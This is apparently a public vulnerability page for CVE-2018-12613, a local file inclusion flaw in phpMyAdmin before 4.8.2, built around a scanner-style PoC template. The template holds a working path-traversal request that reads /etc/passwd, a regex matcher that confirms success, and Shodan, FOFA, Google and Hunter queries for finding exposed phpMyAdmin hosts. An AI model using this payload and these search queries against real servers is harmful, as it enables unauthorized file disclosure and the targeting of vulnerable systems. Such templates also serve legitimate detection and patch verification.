CVE-2018-12613: PhpMyAdmin <4.8.2 - Local File Inclusion

2025-08-01 PhpMyAdmin PoC Public

Description

PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).

PoC

id: CVE-2018-12613

info:
  name: PhpMyAdmin <4.8.2 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication).
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server.
  remediation: |
    Upgrade PhpMyAdmin to version 4.8.2 or later to fix the vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
    - https://www.phpmyadmin.net/security/PMASA-2018-4/
    - https://www.exploit-db.com/exploits/44928/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12613
    - https://security.gentoo.org/glsa/201904-16
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-12613
    cwe-id: CWE-287
    epss-score: 0.9835
    epss-percentile: 0.99915
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: phpmyadmin
    product: phpmyadmin
    shodan-query:
      - http.title:"phpmyadmin"
      - http.component:"phpmyadmin"
      - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin"
    fofa-query:
      - title="phpmyadmin"
      - body="pma_servername" && body="4.8.4"
    google-query: intitle:"phpmyadmin"
    hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
  tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d2d0d9601559a40771d4cc14dfd82946e66d8a979640d0ab794e924565a8977e02201332578166753d2d13388058bbda853d7822691f402a3337b07ba4301b2d86f5:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities